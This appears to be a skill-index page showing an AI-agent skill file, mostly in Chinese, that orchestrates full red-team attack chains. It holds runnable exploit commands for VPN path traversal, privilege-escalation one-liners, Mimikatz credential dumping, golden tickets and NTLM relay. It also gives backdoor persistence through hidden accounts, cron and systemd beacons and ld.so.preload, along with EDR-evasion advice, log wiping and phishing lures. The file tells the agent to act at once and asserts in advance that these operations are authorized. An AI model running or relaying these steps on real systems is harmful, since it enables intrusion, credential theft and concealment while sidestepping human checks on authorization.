attack-chain

GitHub

用于授权的多阶段渗透测试编排,规划从侦察到影响评估的完整攻击链。负责协调子Skill、校验工具、更新案例状态及生成含证据链的报告,不适用于单阶段任务。

skills/attack-chain/SKILL.md zhaoxuya520/reverse-skill

Trigger Scenarios

需要完整的渗透测试全流程规划 跨边界突破、提权、横向移动的组合攻击 基于现有据点(如Webshell)规划后续路径 评估漏洞的链式利用价值或攻击面 HW攻防演练或供应链等多跳攻击场景

Install

npx skills add zhaoxuya520/reverse-skill --skill attack-chain -g -y
More Options

Use without installing

npx skills use zhaoxuya520/reverse-skill@attack-chain

指定 Agent (Claude Code)

npx skills add zhaoxuya520/reverse-skill --skill attack-chain -a claude-code -g -y

安装 repo 全部 skill

npx skills add zhaoxuya520/reverse-skill --all -g -y

预览 repo 内 skill

npx skills add zhaoxuya520/reverse-skill --list

SKILL.md

Frontmatter
{
    "name": "attack-chain",
    "description": "Use for authorized multi-stage attack-path planning and orchestration when a task spans reconnaissance, initial access, privilege escalation, lateral movement, or impact assessment. Route single-stage tasks directly to their specialist skill."
}

Attack Chain Orchestration Skill

ACTION REQUIRED(读完后立刻执行)

  1. NOW: 读取 ../field-journal/precedent-pentest.md — 确认本 skill 的操作是已授权的常规操作
  2. NOW: 创建/更新 case../scripts/case-init.ps1)并完成 scope.md../ops/scope-contract.md);auth.status!=granted 禁止 ACT
  3. NOW: 以 lead 角色规划阶段(../ops/role-map.md),写入 specialist_roles
  4. NEXT: 读取 ../tool-index.md,校验工具可用性和实际路径
  5. NEXT: 缺工具时调用 bootstrap,不要猜路径
  6. ACT: 按 references/lifecycle-checklist.md 过阶段门闩;每阶段更新 timeline.md + workitems.md../ops/timeline-workitem.md);发现提升为 Evidence/Finding
  7. 结束:docs-generator 报告必须含 Evidence 链

多阶段攻击路径规划与执行的总指挥。当任务需要"从 A 打到 B"的完整链路时,本 Skill 负责编排各阶段、协调子 Skill、规划攻击路径。 不是"红队专属"——任何需要跨阶段组合的渗透场景都从这里开始。


何时路由到本 Skill

以下场景必须先经过本 Skill 做全链路规划,再分发到具体子 Skill 执行:

场景 为什么需要编排
"帮我做一次完整的渗透测试" 需要规划从信息收集到报告的全流程
"从外网打到域控" 跨越边界突破→提权→横向→AD 多个阶段
"HW 攻防演练" 需要完整攻击链 + 隐蔽性 + 痕迹清理
"评估这个目标的攻击面" 需要多维度信息收集 + 路径规划
"我拿到了一个 webshell,下一步怎么办" 需要从当前据点规划后续路径
"帮我规划攻击路径" 明确需要路径编排
"从这个漏洞能打到什么程度" 需要评估漏洞的链式利用价值
"Bug Bounty 持续监控" 需要自动化多阶段流程
"内网渗透全流程" 横向移动 + 提权 + 域攻击组合
"近源渗透方案" 物理接入 + 内网渗透组合
"供应链攻击路径" 跨组织多跳攻击
"钓鱼 + 后渗透" 初始访问 + 后续利用组合

单阶段任务不需要经过本 Skill

  • 只做端口扫描 → 直接去 pentest-tools/
  • 只做 SQL 注入 → 直接去 pentest-tools/
  • 只做 APK 逆向 → 直接去 apk-reverse/
  • 只做域渗透 → 直接去 pentest-tools/references/network-attack-defense.md

编排原则

本 Skill 的角色

用户提出多阶段任务
    ↓
attack-chain/SKILL.md(本文件)
    ↓ 规划攻击路径、确定阶段顺序
    ↓ 评估每阶段所需工具和方法
    ↓
分发到具体子 Skill 执行:
    ├── pentest-tools/     → 工具调用、漏洞利用
    ├── apk-reverse/       → 移动端渗透
    ├── js-reverse/        → Web 前端突破
    ├── reverse-engineering/ → 二进制分析
    ├── ida-reverse/       → 深度逆向
    └── browser-automation/ → 自动化操作
    ↓
每阶段完成后回到本 Skill 评估下一步
    ↓
全部完成 → docs-generator 生成报告

路径规划决策树

拿到目标后:
1. 目标是什么?(Web/内网/云/移动/IoT)
2. 当前有什么?(外部视角/已有凭据/已有据点)
3. 最终目标是什么?(域控/数据/特定系统/证明影响)
4. 约束条件?(时间/隐蔽性/不可触碰的系统)
    ↓
根据以上信息规划最短路径
    ↓
一条路走不通 → 回到本 Skill 重新规划备选路径

完整攻击链阶段


一、信息收集阶段(Reconnaissance)

1.1 企业数字资产测绘

# 子公司关联域名发现
subfinder -d target.com -o subdomains.txt
amass enum -d target.com -passive -o amass_results.txt

# 合并去重
cat subdomains.txt amass_results.txt | sort -u > all_subs.txt

# 存活探测
httpx -l all_subs.txt -status-code -title -tech-detect -o alive.txt

# 端口扫描(全端口)
naabu -l all_subs.txt -top-ports 1000 -o ports.txt
nmap -sV -sC -iL targets.txt -oA nmap_results

实战要点

  • 通过企查查/天眼查获取子公司列表,扩大攻击面
  • 关注测试环境(test.、dev.、staging.)和新上线系统
  • 证书透明度日志(crt.sh)发现隐藏域名

1.2 敏感信息泄露狩猎

# GitHub 搜索
# org:Company filename:.env password
# org:Company filename:config.yml secret
# org:Company "jdbc:mysql" password

# Google Dork
# site:target.com filetype:sql
# site:target.com inurl:admin
# site:target.com ext:conf|cfg|ini

# JS 文件中的 API Key
cat js_urls.txt | while read url; do
  curl -s "$url" | grep -oP '(api[_-]?key|secret|token|password)\s*[:=]\s*["\047][^"\047]+'
done

高价值目标

  • 云服务 AK/SK(阿里云、AWS、Azure)
  • 数据库连接字符串
  • JWT 密钥
  • 内部 API 文档
  • VPN/堡垒机凭据

1.3 员工信息画像

社工字典生成规则

{姓名拼音}{年份}       → zhangsan2024
{姓名首字母}{部门缩写}  → zs_dev
{工号}@{域名}          → 10086@target.com
{姓名}{常见后缀}       → zhangsan@123, zhangsan!@#

信息来源

  • 脉脉/LinkedIn 部门架构
  • 企业公众号/官网团队介绍
  • 招聘信息(技术栈暴露)
  • 学术论文(邮箱暴露)

1.4 技术栈指纹识别

# Web 指纹
whatweb -i alive.txt --log-json=fingerprint.json
httpx -l alive.txt -tech-detect -json -o tech.json

# 特定框架探测
nuclei -l alive.txt -tags tech -severity info -o tech_results.txt

# CMS 识别
wpscan --url https://target.com --enumerate p,t,u

二、边界突破阶段(Initial Access)

2.1 Web 漏洞利用(高频突破点)

漏洞类型 检测工具 利用方式
SQL 注入 sqlmap 数据提取 → 写 shell → OS 命令
SSTI sstimap 模板注入 → RCE
文件上传 手工 + Burp Webshell → 反弹 shell
反序列化 ysoserial/marshalsec Java/PHP/Python RCE
SSRF 手工 内网探测 → 云元数据 → AK/SK
未授权访问 nuclei Spring Actuator / Nacos / Redis
XSS → Cookie xsstrike 管理员会话劫持
# SQL 注入自动化
sqlmap -u "https://target.com/api?id=1" --batch --dbs --random-agent

# SSTI 检测
sstimap -u "https://target.com/search?q=test"

# Nuclei 批量扫描
nuclei -l alive.txt -severity critical,high -tags cve,sqli,rce -o vulns.txt

2.2 供应链攻击

攻击路径

  1. 识别目标使用的第三方组件/服务商
  2. 攻击供应商获取代码签名/更新推送权限
  3. 通过合法更新通道投递恶意载荷

常见入口

  • 开源组件投毒(npm/pip/maven)
  • SaaS 服务商 API 滥用
  • 外包人员权限利用
  • 共享 IT 服务商横向渗透

2.3 钓鱼攻击

邮件钓鱼

主题模板:
- [紧急] VPN 证书即将过期,请立即更新
- [IT通知] 邮箱存储空间不足,请清理
- [HR] 2024年度绩效考核结果查询
- [财务] 报销系统升级,请重新登录确认

载荷类型

  • Office 宏文档(.docm/.xlsm)
  • LNK 快捷方式(伪装 PDF)
  • HTML 走私(HTML Smuggling)
  • ISO/IMG 镜像(绕过 MOTW)
  • OneNote 嵌入脚本

OAuth 钓鱼(2025 新趋势):

  • 构造恶意 OAuth 应用请求权限
  • 用户授权后获取邮箱/文件访问权限
  • 无需密码,绕过 MFA

2.4 近源渗透(Physical Access)

手法 工具 效果
BadUSB Rubber Ducky / WiFi Ducky 键盘注入 → 反弹 shell
恶意充电宝 O.MG Cable 伪装数据线植入后门
WiFi 钓鱼 Fluxion / WiFi Pineapple 伪造热点 → 凭据捕获
RFID 克隆 Proxmark3 门禁卡复制 → 物理进入
网络植入 Raspberry Pi / LAN Turtle 内网持久接入点
# Fluxion WiFi 钓鱼
fluxion  # 交互式选择目标 AP → 创建伪造热点 → 捕获 WPA 密码

# BadUSB 联动 Cobalt Strike
# 通过 USB 注入 PowerShell 下载器 → 上线 C2

2.5 VPN/远程接入突破

# Pulse Secure VPN(CVE-2019-11510)
curl -k "https://vpn.target.com/dana-na/../dana/html5acc/guacamole/../../../etc/passwd?/dana/html5acc/guacamole/"

# Fortinet VPN(CVE-2018-13379)
curl -k "https://vpn.target.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"

# 通用:密码喷洒
hydra -L users.txt -P passwords.txt vpn.target.com https-form-post

2.6 云服务突破

# AWS S3 桶枚举
aws s3 ls s3://target-bucket --no-sign-request

# 云元数据 SSRF
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Azure AD 密码喷洒
# 使用 MSOLSpray / Spray 工具

三、权限提升阶段(Privilege Escalation)

3.1 Windows 提权

技术 条件 工具
Potato 系列 SeImpersonate 权限 SweetPotato / GodPotato / PrintSpoofer
内核漏洞 未打补丁 watson / wesng 检测
服务路径劫持 不带引号的服务路径 PowerUp
DLL 劫持 可写 DLL 搜索路径 Process Monitor
AlwaysInstallElevated 注册表配置 msiexec 安装恶意 MSI
计划任务 可写任务脚本 schtasks 替换
# 检测 SeImpersonate
whoami /priv | findstr "SeImpersonate"

# Potato 提权
.\GodPotato.exe -cmd "cmd /c whoami"

# 自动化检测
.\winPEAS.exe

3.2 Linux 提权

# SUID 检测
find / -perm -4000 -type f 2>/dev/null

# sudo 滥用
sudo -l
# 常见可利用:vim, find, python, nmap, less, awk, perl

# sudo vim 提权
sudo vim -c ':!/bin/bash'

# sudo find 提权
sudo find / -exec /bin/bash \;

# 内核漏洞
uname -r  # 检查版本
# DirtyPipe (CVE-2022-0847), DirtyCow (CVE-2016-5195)

# 自动化检测
./linpeas.sh

3.3 数据库提权

-- MSSQL xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

-- MySQL UDF 提权
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id');

-- PostgreSQL
COPY (SELECT '') TO PROGRAM 'id';

3.4 云权限提升

# AWS IAM 枚举
aws iam list-attached-user-policies --user-name compromised-user
# 寻找 iam:PassRole + lambda:CreateFunction → 管理员权限

# Azure AD
# 全局管理员 → 所有订阅控制
# 应用管理员 → 添加凭据到服务主体

四、横向移动阶段(Lateral Movement)

4.1 凭据获取

# Mimikatz(Windows)
mimikatz# sekurlsa::logonpasswords
mimikatz# lsadump::dcsync /domain:target.local /user:krbtgt

# Linux 凭据
cat /etc/shadow
cat ~/.bash_history | grep -i pass
find / -name "*.conf" -exec grep -l "password" {} \;

# NTLM Hash 提取
secretsdump.py domain/user:password@dc_ip

4.2 Pass-the-Hash / Pass-the-Ticket

# PTH 横向
crackmapexec smb 10.0.0.0/24 -u administrator -H <NTLM_HASH> --exec-method smbexec

# Kerberoasting
GetUserSPNs.py -request -dc-ip 10.0.0.1 domain/user:password

# AS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip 10.0.0.1

# 金票据
mimikatz# kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-... /krbtgt:<HASH> /ptt

4.3 隐蔽横向技术

# WMI 无文件执行
wmiexec.py domain/admin:password@target_ip "whoami"

# DCOM 远程执行
dcomexec.py domain/admin:password@target_ip "whoami"

# WinRM
evil-winrm -i target_ip -u admin -H <NTLM_HASH>

# PsExec(会留痕)
psexec.py domain/admin:password@target_ip

# SSH 隧道(Linux 环境)
ssh -D 1080 user@pivot_host  # SOCKS 代理
ssh -L 3389:internal_host:3389 user@pivot_host  # 端口转发

4.4 NTLM Relay

# 关闭 Responder 的 SMB/HTTP
# 编辑 Responder.conf: SMB = Off, HTTP = Off

# 启动 Responder 捕获
responder -I eth0

# NTLM Relay 到目标
ntlmrelayx.py -tf targets.txt -smb2support

# Coercer 强制认证
coercer coerce -u user -p password -d domain -l attacker_ip -t dc_ip

4.5 AD 攻击路径

# BloodHound 数据收集
bloodhound-python -d domain.local -u user -p password -c All -ns dc_ip

# 常见攻击路径:
# 1. 用户 → GenericAll → 目标用户 → 重置密码
# 2. 用户 → WriteDacl → 目标 OU → 添加权限
# 3. 计算机 → 约束委派 → 模拟任意用户
# 4. 用户 → DCSync 权限 → 导出所有 Hash

# Certipy AD CS 攻击
certipy find -u user@domain -p password -dc-ip dc_ip
certipy req -u user@domain -p password -ca CA-NAME -template VulnTemplate

五、权限维持阶段(Persistence)

5.1 Windows 持久化

技术 隐蔽性 检测难度
计划任务
注册表 Run 键
WMI 事件订阅
DLL 劫持
影子账户
Golden Ticket 极高 极高
DSRM 后门 极高 极高
# WMI 事件订阅(高隐蔽)
$Filter = Set-WmiInstance -Class __EventFilter -Arguments @{
    Name = "CoreFilter"
    EventNameSpace = "root\cimv2"
    QueryLanguage = "WQL"
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}

# 影子账户
net user support$ P@ssw0rd /add /active:yes
net localgroup administrators support$ /add
# 修改注册表 F 值克隆 RID

5.2 Linux 持久化

# SSH 密钥植入
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

# Crontab 后门
(crontab -l; echo "*/5 * * * * /tmp/.hidden/beacon") | crontab -

# LD_PRELOAD 劫持
echo "/tmp/.hidden/evil.so" > /etc/ld.so.preload

# PAM 后门
# 修改 pam_unix.so 添加万能密码

# Systemd 服务
cat > /etc/systemd/system/update.service << 'EOF'
[Unit]
Description=System Update Service
[Service]
ExecStart=/tmp/.hidden/beacon
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable update.service

5.3 云环境持久化

# AWS Lambda 后门
# 创建定时触发的 Lambda 函数,回连 C2

# Azure AD 应用注册
# 创建应用 → 添加密钥凭据 → 授予 Graph API 权限

# 容器后门
# 修改基础镜像 → 所有新容器自带后门

六、EDR/AV 绕过(Evasion)

6.1 核心绕过思路

层面 技术 说明
静态检测 加密/混淆/自定义加载器 避免签名匹配
行为检测 间接系统调用/Unhooking 绕过 API Hook
内存检测 模块踩踏/堆加密 避免内存扫描
网络检测 域前置/合法服务隧道 混入正常流量
日志检测 ETW Patching/日志清除 减少痕迹

6.2 实用绕过技术

1. Shellcode 加载器自定义(不用公开工具)
2. 系统调用直接调用(绕过 ntdll hook)
3. 进程注入选择低监控进程(如 RuntimeBroker.exe)
4. C2 流量走 HTTPS + 域前置 / Cloudflare Workers
5. 内存中执行,不落盘(Fileless)
6. 利用合法签名程序加载(LOLBins)

6.3 C2 框架选择

框架 特点 适用场景
Cobalt Strike 成熟稳定,团队协作 大型红队行动
Sliver 开源,Go 编写 预算有限
Havoc 现代化,模块化 需要定制
Mythic 多 agent 支持 跨平台
AdaptixC2 Kali 2026.1 收录 快速部署

七、痕迹清理(Anti-Forensics)

# Windows 日志清除
wevtutil cl Security
wevtutil cl System
wevtutil cl Application

# Linux 日志清除
echo > /var/log/auth.log
echo > /var/log/syslog
history -c && history -w

# 时间戳修改
touch -t 202301010000 /path/to/file

# 内存清理
# 确保 Mimikatz dump 已删除
# 确保 C2 beacon 已退出
# 确保临时文件已清除

红队行动铁律

三条底线

  1. 所有操作必须获得书面授权
  2. 数据渗出需进行匿名化处理
  3. 清理所有攻击痕迹(包括内存驻留)

行动纪律

  • 每个操作前评估风险等级(低/中/高/严重)
  • 高风险操作前通知项目经理
  • 保持操作日志(时间、动作、结果)
  • 发现高危漏洞立即上报,不扩大利用
  • 不影响业务可用性(禁止 DoS)
  • 不访问/下载真实用户数据

典型失败案例

失败原因 后果 教训
未清除 Mimikatz 内存 dump 蓝队溯源完整攻击路径 操作后立即清理
C2 域名被威胁情报标记 首次连接即被拦截 使用新注册域名 + 域前置
钓鱼邮件触发 DLP 告警 蓝队提前预警 测试邮件网关规则
横向移动触发蜜罐 暴露攻击意图 先识别蜜罐再行动

工具速查表

信息收集

subfinder amass httpx naabu katana gau dnsx nmap whatweb wpscan

漏洞利用

nuclei sqlmap sstimap xsstrike burpsuite metasploit

权限提升

winPEAS linpeas GodPotato PrintSpoofer watson

横向移动

mimikatz crackmapexec/netexec impacket bloodhound certipy coercer responder evil-winrm

C2 框架

cobalt-strike sliver havoc mythic adaptixc2

近源渗透

fluxion aircrack-ng proxmark3 rubber-ducky wifi-pineapple


与本包其他 Skill 的关系

需求 路由到
Web 漏洞深度利用 pentest-tools/SKILL.md
内网 AD 攻击详细步骤 pentest-tools/references/network-attack-defense.md
逆向分析恶意样本 reverse-engineering/SKILL.md
APK 逆向(移动端渗透) apk-reverse/SKILL.md
JS 前端签名绕过 js-reverse/SKILL.md
自动化群体渗透 Pentest Swarm AI(pentestswarm scan --swarm
AI 辅助渗透 mcp-kali-server / metasploitmcp / hexstrike-ai
报告生成 docs-generator/SKILL.md
攻击路径图 diagram-generator/SKILL.md

任务完成自检(声称完成前 MUST 通过)

  • 我是否执行了工作流中的每一步(而不是只阅读)?
  • 我是否基于 tool-index 使用了真实工具路径?
  • 我是否产出了可复现证据(命令/脚本/截图/报告)?
  • 我是否完成并回写了 RULES 要求的 Checklist 项?

Version History

  • b8ae07d Current 2026-07-19 23:09

Same Skill Collection

CTF-Sandbox-Orchestrator/competition-crypto-mobile/SKILL.md
CTF-Sandbox-Orchestrator/competition-reverse-pwn/SKILL.md
CTF-Sandbox-Orchestrator/competition-stego-media/SKILL.md
CTF-Sandbox-Orchestrator/competition-web-runtime/SKILL.md
CTF-Sandbox-Orchestrator/ctf-sandbox-orchestrator/SKILL.md
skills/api-security/SKILL.md
skills/apk-reverse/SKILL.md
skills/binary-diff/SKILL.md
skills/browser-automation/SKILL.md
skills/browser-extension-reverse/SKILL.md
skills/cloud-k8s/SKILL.md
skills/code-audit/SKILL.md
skills/database-security/SKILL.md
skills/digital-forensics/SKILL.md
skills/docs-generator/SKILL.md
skills/dotnet-reverse/SKILL.md
skills/email-security/SKILL.md
skills/firmware-pentest/SKILL.md
skills/ghidra-reverse/SKILL.md
skills/go-rust-reverse/SKILL.md
skills/hardware-security/SKILL.md
skills/identity-federation/SKILL.md
skills/js-reverse/SKILL.md
skills/llm-security/SKILL.md
skills/macos-reverse/SKILL.md
skills/malware-analysis/SKILL.md
skills/mobile-reverse/SKILL.md
skills/ot-ics/SKILL.md
skills/patch-diff-exploit/SKILL.md
skills/pentest-tools/SKILL.md
skills/pentest-tools/src-hunter/SKILL.md
skills/protocol-reverse/SKILL.md
skills/pwn-chain/SKILL.md
skills/radare2/SKILL.md
skills/radio-sdr/SKILL.md
skills/SKILL.md
skills/supply-chain-security/SKILL.md
skills/thick-client/SKILL.md
skills/threat-hunting/SKILL.md
skills/wifi-wireless/SKILL.md
skills/windows-ad/SKILL.md
CTF-Sandbox-Orchestrator/competition-ad-certificate-abuse/SKILL.md
CTF-Sandbox-Orchestrator/competition-agent-cloud/SKILL.md
CTF-Sandbox-Orchestrator/competition-android-hooking/SKILL.md
CTF-Sandbox-Orchestrator/competition-browser-persistence/SKILL.md
CTF-Sandbox-Orchestrator/competition-bundle-sourcemap-recovery/SKILL.md
CTF-Sandbox-Orchestrator/competition-cloud-metadata-path/SKILL.md
CTF-Sandbox-Orchestrator/competition-container-runtime/SKILL.md
CTF-Sandbox-Orchestrator/competition-custom-protocol-replay/SKILL.md
CTF-Sandbox-Orchestrator/competition-dpapi-credential-chain/SKILL.md
CTF-Sandbox-Orchestrator/competition-file-parser-chain/SKILL.md
CTF-Sandbox-Orchestrator/competition-firmware-layout/SKILL.md
CTF-Sandbox-Orchestrator/competition-forensic-timeline/SKILL.md
CTF-Sandbox-Orchestrator/competition-graphql-rpc-drift/SKILL.md
CTF-Sandbox-Orchestrator/competition-identity-windows/SKILL.md
CTF-Sandbox-Orchestrator/competition-ios-runtime/SKILL.md
CTF-Sandbox-Orchestrator/competition-jwt-claim-confusion/SKILL.md
CTF-Sandbox-Orchestrator/competition-k8s-control-plane/SKILL.md
CTF-Sandbox-Orchestrator/competition-kerberos-delegation/SKILL.md
CTF-Sandbox-Orchestrator/competition-kernel-container-escape/SKILL.md
CTF-Sandbox-Orchestrator/competition-linux-credential-pivot/SKILL.md
CTF-Sandbox-Orchestrator/competition-lsass-ticket-material/SKILL.md
CTF-Sandbox-Orchestrator/competition-mailbox-abuse/SKILL.md
CTF-Sandbox-Orchestrator/competition-malware-config/SKILL.md
CTF-Sandbox-Orchestrator/competition-oauth-oidc-chain/SKILL.md
CTF-Sandbox-Orchestrator/competition-pcap-protocol/SKILL.md
CTF-Sandbox-Orchestrator/competition-prompt-injection/SKILL.md
CTF-Sandbox-Orchestrator/competition-queue-worker-drift/SKILL.md
CTF-Sandbox-Orchestrator/competition-race-condition-state-drift/SKILL.md
CTF-Sandbox-Orchestrator/competition-relay-coercion-chain/SKILL.md
CTF-Sandbox-Orchestrator/competition-request-normalization-smuggling/SKILL.md
CTF-Sandbox-Orchestrator/competition-runtime-routing/SKILL.md
CTF-Sandbox-Orchestrator/competition-ssrf-metadata-pivot/SKILL.md
CTF-Sandbox-Orchestrator/competition-supply-chain/SKILL.md
CTF-Sandbox-Orchestrator/competition-template-render-path/SKILL.md
CTF-Sandbox-Orchestrator/competition-websocket-runtime/SKILL.md
CTF-Sandbox-Orchestrator/competition-windows-pivot/SKILL.md
skills/diagram-generator/SKILL.md
skills/edr-bypass-re/SKILL.md
skills/ida-reverse/SKILL.md
skills/reverse-engineering/SKILL.md

Metadata

Files
0
Version
b8ae07d
Hash
d4e78a53
Indexed
2026-07-19 23:09

inicio - Wiki
Copyright © 2011-2026 iteam. Current version is 2.155.2. UTC+08:00, 2026-07-22 06:47
浙ICP备14020137号-1 $mapa de visitantes$